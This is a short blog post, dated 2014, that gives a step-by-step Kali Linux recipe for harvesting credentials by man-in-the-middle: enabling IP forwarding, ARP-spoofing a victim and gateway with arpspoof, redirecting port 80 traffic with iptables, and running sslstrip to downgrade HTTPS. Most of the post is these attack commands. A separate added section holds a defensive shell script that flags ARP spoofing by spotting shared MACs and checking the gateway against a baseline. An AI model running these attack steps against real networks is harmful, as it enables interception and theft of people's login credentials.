Computers, Programming, Technology, Music, Literature


Devouring Security: Sslstrip and arpspoofing for credential harvesting





You may think you are connecting to a website over SSL, but did you forget to check for https in the address bar?



Victim – Windows 7 –

Attacker – Kali Linux –


arpspoof gateway –



•Flip your machine into forwarding mode.

echo "1" > /proc/sys/net/ipv4/ip_forward


•Run arpspoof to convince a network they should send their traffic to you.

arpspoof -i <interface> -t <targetIP> <gatewayIP>


arpspoof -i eth0 -t


•Set up iptables to redirect HTTP traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


•Run sslstrip.

sslstrip -l <listenPort>
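Seen from the victim's side, the arpspoof step above leaves the gateway IP resolving to the attacker's MAC, so one MAC shows up for two IPs in the ARP cache. The check below is an added example, not part of the original post; the function names, sample table, addresses and baseline MAC are constructed, and the input format assumed is Linux /proc/net/arp.

```shell
#!/bin/sh
# Added example (not from the original post). Input format: Linux /proc/net/arp.
# Addresses and MACs below are constructed sample values.
SAMPLE_ARP='IP address       HW type     Flags       HW address            Mask     Device
192.0.2.1        0x1         0x2         02:00:00:aa:bb:0c     *        eth0
192.0.2.23       0x1         0x2         02:00:00:aa:bb:0c     *        eth0
192.0.2.40       0x1         0x2         02:00:00:11:22:33     *        eth0'

# Print "mac ip1,ip2,..." for every MAC that more than one IP resolves to.
# A shared MAC can be legitimate (proxy ARP, multi-homed router), so treat a
# hit as a lead to investigate, not proof.
find_shared_macs() {
    awk '
        NR == 1 { next }                      # header row
        $4 == "00:00:00:00:00:00" { next }    # incomplete entry
        {
            mac = tolower($4)
            if (mac in ips) ips[mac] = ips[mac] "," $1
            else            ips[mac] = $1
            count[mac]++
        }
        END { for (m in count) if (count[m] > 1) print m, ips[m] }
    ' | sort
}

# check_gateway GATEWAY_IP KNOWN_GOOD_MAC  (ARP table on stdin)
# Exit 0: entry matches baseline; 1: MAC differs; 2: gateway not in table.
check_gateway() {
    want=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    awk -v ip="$1" -v want="$want" '
        NR > 1 && $1 == ip { found = 1; if (tolower($4) != want) bad = 1 }
        END { exit (!found ? 2 : (bad ? 1 : 0)) }
    '
}

# Run against the constructed sample; on a live Linux host use < /proc/net/arp.
printf '%s\n' "$SAMPLE_ARP" | find_shared_macs
printf '%s\n' "$SAMPLE_ARP" | check_gateway 192.0.2.1 02:00:00:00:00:01 \
    || echo "gateway 192.0.2.1 does not match baseline MAC"
```

The baseline MAC for check_gateway has to be recorded while the network is known to be clean, for example from the router's label or its admin page.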





Written by gmaran23

July 4, 2014 at 8:58 pm